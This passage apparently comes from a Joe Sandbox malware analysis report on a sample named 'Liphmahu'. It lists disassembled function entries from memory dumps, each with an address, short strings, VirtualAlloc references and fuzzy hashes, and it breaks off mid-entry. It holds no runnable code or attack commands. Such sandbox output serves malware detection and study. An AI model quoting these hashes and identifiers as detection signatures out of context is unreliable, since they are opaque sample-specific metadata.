Function 05D6B450 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

4'kq, xrefs: 05D6B4F7

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID: 4'kq
API String ID: 0-3255046985
Opcode ID: 7a411c214bd372e38eac97e3124de1d628092af4795476e01ccda1c5e8936765
Instruction ID: 1dfa610dca5bcee8a0aefda19acb771834882ca896f93fb1d743c3c47da5af33
Opcode Fuzzy Hash: 7a411c214bd372e38eac97e3124de1d628092af4795476e01ccda1c5e8936765
Instruction Fuzzy Hash: 7A314D313406149FD308DB29C9A8B2B77EAEFC8704F104469E606CB3A5DE75EC42C790

Function 05D67211 Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

4'kq, xrefs: 05D67259

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID: 4'kq
API String ID: 0-3255046985
Opcode ID: 7d6576045165c37614ca049c97006fc5d221b8a319013894c6c79dfa0a715c74
Instruction ID: 7be4e30927a8e4c2ac604994cf70ae304c671eaa184608b062d36092db56835d
Opcode Fuzzy Hash: 7d6576045165c37614ca049c97006fc5d221b8a319013894c6c79dfa0a715c74
Instruction Fuzzy Hash: E9317131640204DFCF059F68C954E9DBBB6FF88320B1540AAEA0A9B365CA32EC57CB50

Function 05D62530 Relevance: 1.3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

Strings

p<kq, xrefs: 05D6257A

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID: p<kq
API String ID: 0-3321991346
Opcode ID: 7f79729c496fa7e30116b3351e94632df3e8b487e9f65e5dbdec6407d985e538
Instruction ID: ba7f87a8f991a360eb45f5c5d570a0d839de758a49ea478a1d39b1f66368cbf4
Opcode Fuzzy Hash: 7f79729c496fa7e30116b3351e94632df3e8b487e9f65e5dbdec6407d985e538
Instruction Fuzzy Hash: 8F213A753482549FCB12DF29C864AAA7BEABF8E350B054096FC45CB271CA35DC52CB60

Function 05D21E8D Relevance: 1.3, Strings: 1, Instructions: 74COMMON

Download Yara Rule

Strings

4'kq, xrefs: 05D22659

Memory Dump Source

Source File: 00000004.00000002.2207785576.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d20000_Liphmahu.jbxd

Similarity

API ID:
String ID: 4'kq
API String ID: 0-3255046985
Opcode ID: 7eea7e04c209666ad6ba0078e72af6f7d1f3dd7e9601164c98b9e740c0eab516
Instruction ID: c2cb82c4272951b3b22a857f031e139c4b526510e69fb2bcb6c33c866b874af4
Opcode Fuzzy Hash: 7eea7e04c209666ad6ba0078e72af6f7d1f3dd7e9601164c98b9e740c0eab516
Instruction Fuzzy Hash: 6A31BB35D08219DFDB14CFA9D8046FEBBB2FF55306F10806AE061A7251D7389A46CF91

Function 05D62540 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

p<kq, xrefs: 05D6257A

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID: p<kq
API String ID: 0-3321991346
Opcode ID: d1a1e7546300ee84ec00f0764262fa86a04adb4f49fb94a1accf70101f9e22bf
Instruction ID: dab8c4aec884db850e08751b910328fbd0be817ed36201f1b064dc13a3e239b0
Opcode Fuzzy Hash: d1a1e7546300ee84ec00f0764262fa86a04adb4f49fb94a1accf70101f9e22bf
Instruction Fuzzy Hash: 36214C743442549FCB11CF2AC854AAA7BEABF8D350B054096FC55CB3B1CA35DC52CB60

Function 05D4FC30 Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

,oq, xrefs: 05D4FCA3

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID: ,oq
API String ID: 0-651702701
Opcode ID: 809488b8faf6d4a11b442befcbb0171e728a3ef5355c93bf20a44cbf876a9e16
Instruction ID: 36da6634519c3943dd820a0a22a4f85e1e69f6a910a14374d9331c9bd5b9d238
Opcode Fuzzy Hash: 809488b8faf6d4a11b442befcbb0171e728a3ef5355c93bf20a44cbf876a9e16
Instruction Fuzzy Hash: DD117C357002069FCB05DF69C9549AEBBB6AF85300B158066E901DB3B5DB30DD41CBA1

Function 068010F8 Relevance: 1.3, APIs: 1, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 0680116B

Memory Dump Source

Source File: 00000004.00000002.2215546925.0000000006800000.00000040.00000800.00020000.00000000.sdmp, Offset: 06800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6800000_Liphmahu.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3a34d5414c7a3d2eff0474bf7f3c65252453528d58f43da408df8396527210f4
Instruction ID: 87f10c12cf31fba109144f1cb3936ad89658419125cb3abd6adae1d5e9b6eeb5
Opcode Fuzzy Hash: 3a34d5414c7a3d2eff0474bf7f3c65252453528d58f43da408df8396527210f4
Instruction Fuzzy Hash: C2118971D002489FDB20CFA9C848BEEBBF5AB48320F108819D555A7250C7759941CB90

Function 06801100 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 0680116B

Memory Dump Source

Source File: 00000004.00000002.2215546925.0000000006800000.00000040.00000800.00020000.00000000.sdmp, Offset: 06800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6800000_Liphmahu.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8e6c4b95a7ef4e255b1c932801b47f1e650f05409aaba8e4556056512322ed6c
Instruction ID: fe4ced70bf03c2778f179b78a7c30ed6d4be56cd29950679932e4c64a92c2e6d
Opcode Fuzzy Hash: 8e6c4b95a7ef4e255b1c932801b47f1e650f05409aaba8e4556056512322ed6c
Instruction Fuzzy Hash: 3E1134729002499FDB20DFAAC844BDEBBF5EF88320F208819D559A7250C775A545CFA4

Function 05D4A978 Relevance: 1.3, Strings: 1, Instructions: 48COMMON

Download Yara Rule

Strings

Tekq, xrefs: 05D4B219

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID: Tekq
API String ID: 0-2319236580
Opcode ID: e6d7c93de9445ab8729f82226592ca8faa1159c2c8610a4c1b50abac90c67d0c
Instruction ID: e9c328aced3f8883a40a920dcab046aa49d9958d7319720aeae9ff90c8ac4c48
Opcode Fuzzy Hash: e6d7c93de9445ab8729f82226592ca8faa1159c2c8610a4c1b50abac90c67d0c
Instruction Fuzzy Hash: 87116674E04218CFDB54DF69CC447EDBBB6EB89301F4080AAE548AB340DB70AE848F91

Function 06C682B5 Relevance: 1.3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

Strings

z, xrefs: 06C682F1

Memory Dump Source

Source File: 00000004.00000002.2216506456.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c60000_Liphmahu.jbxd

Similarity

API ID:
String ID: z
API String ID: 0-1657960367
Opcode ID: 7c9ed6372ee5c61cd40dc18287e1e345f703e5e44b93201f1a4d924aaf97f690
Instruction ID: 14d0b22f50b2276da9e19927c0fa17358ec75c06dff634124b7aaf5f36008ec5
Opcode Fuzzy Hash: 7c9ed6372ee5c61cd40dc18287e1e345f703e5e44b93201f1a4d924aaf97f690
Instruction Fuzzy Hash: 1311F870A0411A8FEBA4DF58C994BADB7B1FB49304F1085E5E11DB7240DB709EC88F55

Function 05D6C088 Relevance: .4, Instructions: 437COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 013e98e8a0ab447f9048b29855542499a8b9106b7ddb59656fa5a5302848f358
Instruction ID: e98aaf22914815c823b048626ad8cf4132bbff95310d40c9451495d42d1fda74
Opcode Fuzzy Hash: 013e98e8a0ab447f9048b29855542499a8b9106b7ddb59656fa5a5302848f358
Instruction Fuzzy Hash: D412BD34B102198FCB14EF64C994A9DB7B2FF89300F5185AAD54AAB365DF30ED86CB50

Function 05D62663 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62c35cfaeb0a352e75576ac4a70efe8b6fadc8307d1d7391348ae6710f093e2b
Instruction ID: 67cf068472a093851b469d8697045ad27c18bf72ce805a6f9db30b78777ce58b
Opcode Fuzzy Hash: 62c35cfaeb0a352e75576ac4a70efe8b6fadc8307d1d7391348ae6710f093e2b
Instruction Fuzzy Hash: C5A12C35E0061A8FCB11DFA5E855AFEBBB1FF48301F148116E852A7368DB789946CF50

Function 05D6D030 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 963f2dd21c85440776c7d6799232528e750721ff44a1601e3b5edcfbed48f854
Instruction ID: 069f6338fde3adb1727cd883aa8f0c53ca8531d0cc29485998ef0632b6974f24
Opcode Fuzzy Hash: 963f2dd21c85440776c7d6799232528e750721ff44a1601e3b5edcfbed48f854
Instruction Fuzzy Hash: 7F81F930750614DFCB04EF68D898A6DB7B6FF89710F54416AE5069B3A5CB74EC42CB90

Function 05D64AB0 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96a07c81caa994e5d0b5b3da1719dfc307d1eec7e5db4c7c8d93bb076f8b1fd3
Instruction ID: 20b4f3271505c025c95bd546b93051f4769e2b789693ff28a0ca7231e21e6d07
Opcode Fuzzy Hash: 96a07c81caa994e5d0b5b3da1719dfc307d1eec7e5db4c7c8d93bb076f8b1fd3
Instruction Fuzzy Hash: 51810635A00618CFCB14DF68C59499EBBF6FF88710B1581AAE816DB365DB31ED42CB90

Function 05D4F595 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43cae825a99dcc7b50fa86309c73495b42a4a514dc9adebca73472b3d3257624
Instruction ID: 3f543754faaa82bddadc74f3f7d9aa13b4b49b3f38ca51c4cc4934bb98f1c0d9
Opcode Fuzzy Hash: 43cae825a99dcc7b50fa86309c73495b42a4a514dc9adebca73472b3d3257624
Instruction Fuzzy Hash: C8615C35B012059FCB05DF69E558AAEBBB2FF88351F24806AF516A73A0CB35D905CF60

Function 05D6D020 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35db1c6543bb0ed389ad0bd64621b1c4f0379d22ba47dfee118b83133c4181a0
Instruction ID: 05135cf4560f2940ea2cd2bddeef83d95d5caf6818a07e6be87770781d080cc5
Opcode Fuzzy Hash: 35db1c6543bb0ed389ad0bd64621b1c4f0379d22ba47dfee118b83133c4181a0
Instruction Fuzzy Hash: DA612A75B10614DFCB04EF68D898A6DB7B6FF89710F10816AE5069B3A5DB34EC42CB90

Function 05D67970 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02762bd7b5fcc7743abd79985aae62db86987741d0dcf5a483f1e5031dfad843
Instruction ID: d5c3bb77a02e899a747de6847556efba0473cb3d7fe72da764bc67a1e28a8a89
Opcode Fuzzy Hash: 02762bd7b5fcc7743abd79985aae62db86987741d0dcf5a483f1e5031dfad843
Instruction Fuzzy Hash: EF518F34B10609DFCB04DF68E468AAEBBB6FF88711F10811AF50297364DF349946CB90

Function 05D43B08 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae617cf9fbbb67ac38090e901e5cd22af3266ad7e253cc63ed3351a95148db4e
Instruction ID: f69b2e5edaa792501567b483f4dc35e9f22e81252dde48111362f7ac25841388
Opcode Fuzzy Hash: ae617cf9fbbb67ac38090e901e5cd22af3266ad7e253cc63ed3351a95148db4e
Instruction Fuzzy Hash: 9451C370E01208DFDB58DFB9D594A9DBBF2BF89301F20852AE416AB365DB359981CF40

Function 05D43AF9 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 839a0dc0c239931f1e0a3df55a6893e02e426d3103436c6a6f92bb65aae8c600
Instruction ID: 6bc3f2a4bbce282963749252198fa301a71d024502d79ffeba2cfb53eb94f127
Opcode Fuzzy Hash: 839a0dc0c239931f1e0a3df55a6893e02e426d3103436c6a6f92bb65aae8c600
Instruction Fuzzy Hash: 3841E570E01208DFDB58CFB9D584A9DBBB2BF88300F20852EE416AB365DB319981CF40

Function 05D6A550 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d210a32614f2646e10a5e07c57f179383d1588d4ba53d330698111f111945fd
Instruction ID: 61ab45688357743dabdb3d44161ec5a99aeeea2d80d541715a8f316d7c94f19e
Opcode Fuzzy Hash: 0d210a32614f2646e10a5e07c57f179383d1588d4ba53d330698111f111945fd
Instruction Fuzzy Hash: 7931E476610504DFCB05DF98D898EA9BBB2FF48324F1680A9E509AB372C731EC55CB40

Function 05D4F977 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93a71fcab3c74d6239c723bacd293d3fd103c2fa2c5cde7b41f5e446379baf10
Instruction ID: e0055d9aa1ca0291628052a405d6738fa3fa7db50d0122e8ca72be94a4dc230d
Opcode Fuzzy Hash: 93a71fcab3c74d6239c723bacd293d3fd103c2fa2c5cde7b41f5e446379baf10
Instruction Fuzzy Hash: 91417971A002168FCB14CFA5D955ABEBBB2FF48305F00812AD856E7361D735DA05CF90

Function 05D4B839 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e940c18b81061e7222a29365a676dc36e74819d887cd6b06f94e1c97079ab6c
Instruction ID: ac83e05199eedd029b1abeca12dea05b77246ee472c228788d7ff2b366e88bdd
Opcode Fuzzy Hash: 4e940c18b81061e7222a29365a676dc36e74819d887cd6b06f94e1c97079ab6c
Instruction Fuzzy Hash: CC41F1B5E05608DFEB44DFA9D844AAEBBF2FB99300F10806AE445BB354D7349A41CF61

Function 05D4B9B1 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f274aa64a3f71235a902cd780637d6ab19968e3af285f41d5032129f97758916
Instruction ID: 748b1840fa60bf24af43a26d34ed12cf02274fffa5475225652a7aad9335aeb9
Opcode Fuzzy Hash: f274aa64a3f71235a902cd780637d6ab19968e3af285f41d5032129f97758916
Instruction Fuzzy Hash: D3411671A45608DFDB40EFA9D844AAEBBF2FB99310F10806AE405FB344D7359A41CFA1

Function 05D6D33A Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 878ce7f1333fa1c29c97a40283e9b1c88167b7f460bb5598d7b0dac71bd3b19c
Instruction ID: 76b51167bd62fbe5c36bb15694aa4ef5168f8195e26238c54f1125bbd30ec5ea
Opcode Fuzzy Hash: 878ce7f1333fa1c29c97a40283e9b1c88167b7f460bb5598d7b0dac71bd3b19c
Instruction Fuzzy Hash: 3A31FB35B001199BDB14EFA4D855AEEB7B6FF88311F108126D805BB3A4DB35AD06CFA0

Function 05D4B848 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c59d6ae839e4c856f82d9510b828258e6a98104e6de6b894873356e7af77943a
Instruction ID: c6fa5c40f81d054b39346e58c096c5b53191238826adbfdd4f440f99319ecd27
Opcode Fuzzy Hash: c59d6ae839e4c856f82d9510b828258e6a98104e6de6b894873356e7af77943a
Instruction Fuzzy Hash: 6341E570E04608DFEB44DFAAD844AAEBBF2FB98310F10806AE445BB354E7749A41CF51

Function 05D4A9D9 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a31ae11914e792d6c80a718e2f25675878c506a9c5c4a5e1753e8adae227c01
Instruction ID: 82e516b4ac2f148d051742c9acbec107cd852f17507281f61593f24b2b12ff02
Opcode Fuzzy Hash: 4a31ae11914e792d6c80a718e2f25675878c506a9c5c4a5e1753e8adae227c01
Instruction Fuzzy Hash: A541E470A85219CFDB64DF68C945BADBBF3FB49301F2080AAD549BB245DB709985CF00

Function 05D68710 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8db0ce3ca9048a7a23d52b6748e3ce0a96b7c7c834408df6afddb10eb1a7d86
Instruction ID: a52b4bb836c6f95a316ca7ba77e22e29ed03ae1d3e70761f6be73c5771a4b570
Opcode Fuzzy Hash: e8db0ce3ca9048a7a23d52b6748e3ce0a96b7c7c834408df6afddb10eb1a7d86
Instruction Fuzzy Hash: DC21C5323052004FC7249B79E944A66BBE5EBC0361B19857BE54ED7251DB31EC42D791

Function 05D4A729 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c077ba18be2d250fe7ef86dd8aa47b7da9b3ced8b30fdca17165fc7217f7f944
Instruction ID: ad40e1ff94b96da35195595b17af5d288ffded444a2279a2ec181857d3f3f557
Opcode Fuzzy Hash: c077ba18be2d250fe7ef86dd8aa47b7da9b3ced8b30fdca17165fc7217f7f944
Instruction Fuzzy Hash: A731E5B4D45208DFDB54CFA9C944AAEBBF7FB49301F1080AAE459AB361D7349A41CF50

Function 05D61C22 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 974756772499cf902f8603d2ca09bdc2e19d11504162972f9a57bf4fc95c1c3b
Instruction ID: b52860cf0fbea13ccae84ea0ce964f298669d86587b3f9061ba8865a88a8be57
Opcode Fuzzy Hash: 974756772499cf902f8603d2ca09bdc2e19d11504162972f9a57bf4fc95c1c3b
Instruction Fuzzy Hash: 0F318B34701705CFC726AF68D45896EBBB6FF85355B10856EE8028B3A1CF31E84ACB50

Function 05D4A5C9 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6bdaf214b52bf2e49a4eaee5fa5e0f5c787909c301899d2eaf34f67348e4b1b
Instruction ID: c4eaefbb5aa5951c7072be07158528788808d3119c9a4ad78a4f83d8cef0cade
Opcode Fuzzy Hash: d6bdaf214b52bf2e49a4eaee5fa5e0f5c787909c301899d2eaf34f67348e4b1b
Instruction Fuzzy Hash: 28312B75E012189FCB05DFA9D9506EEBBB6FF88310F10806AE455BB364DB359942CF90

Function 05D4FE28 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1df721af1f3e4fda5273cb523b825db18241d39373da807aa962176b801f9bb
Instruction ID: 93c25e9004138b54ecb6b030209462a3e39cd07e38c3d651bae91c2c98de6fac
Opcode Fuzzy Hash: c1df721af1f3e4fda5273cb523b825db18241d39373da807aa962176b801f9bb
Instruction Fuzzy Hash: 3D312634704216CFD714DF65D994D2A77B6BF84646B1094AAD906CB3B6EB31EC01CF60

Function 05D61340 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1d9d614c7b2254f2f6d9980bbdccd996a6c335d351a68e79cf6e80a835edc7d
Instruction ID: 43ca62d0a29b142c01ee26e2b9ad7985d3182dcda1d1ca2b2063b23bc52bde08
Opcode Fuzzy Hash: d1d9d614c7b2254f2f6d9980bbdccd996a6c335d351a68e79cf6e80a835edc7d
Instruction Fuzzy Hash: C5219D32F002158B8B109EE9E8844BEB7BAFB842617204577E817D7741EB30D906C760

Function 008BD4A0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2191934058.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8bd000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dcae9e9ea17321e475df1db92b3a9ded3b9788b33f142fb5c268aa3b04fdb2a
Instruction ID: df1157f8ebd44236f6e5e2ffb132aa82d21b17c2ff5dcaacb2710d1d674e8214
Opcode Fuzzy Hash: 9dcae9e9ea17321e475df1db92b3a9ded3b9788b33f142fb5c268aa3b04fdb2a
Instruction Fuzzy Hash: 3A213371500304EFDB15DF04D9C0B67BF65FB98328F20C169E90A8A356D336E846CBA2

Function 05D61AA0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 413031999c65adf4a2bd9f3387b259e1a3b0e122899548aee8b3664accbec2ad
Instruction ID: 31269d469ffe119f5239006e99621dcb8213d83706abe7aa21c58433ef6fcf60
Opcode Fuzzy Hash: 413031999c65adf4a2bd9f3387b259e1a3b0e122899548aee8b3664accbec2ad
Instruction Fuzzy Hash: F3215771E00219DFDB40DFB8C904BAEBBF5AF45381F108066D55ADB290E734CA52CB91

Function 008CD118 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2192013683.00000000008CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8cd000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5b3206d994b791beecec55fae3f790f9e7024692577a42431b89f07a724d30b
Instruction ID: 24bdd622baf5b98914d78a33e4d39e89ae51b18026bf16ff610d7b63b782309d
Opcode Fuzzy Hash: f5b3206d994b791beecec55fae3f790f9e7024692577a42431b89f07a724d30b
Instruction Fuzzy Hash: 7021CFB1504344DFDB05EF14DA84F2AFBB5FB84314F28857EE8098B256C336D846CAA2

Function 05D4E156 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 204449165c7b5c143de2afec219689ef57d0ddcddbf016dc8f70e2a8d9d3ab15
Instruction ID: 2f42c6544f342a0d69ad569b328e5b112837a8e8d046e0b1196b859c6eddb019
Opcode Fuzzy Hash: 204449165c7b5c143de2afec219689ef57d0ddcddbf016dc8f70e2a8d9d3ab15
Instruction Fuzzy Hash: E1212F35A10215AFCF159FA8D454ADEBBB6FB8C320F14812AE415A7394CB719885CF91

Function 05D4DAD9 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

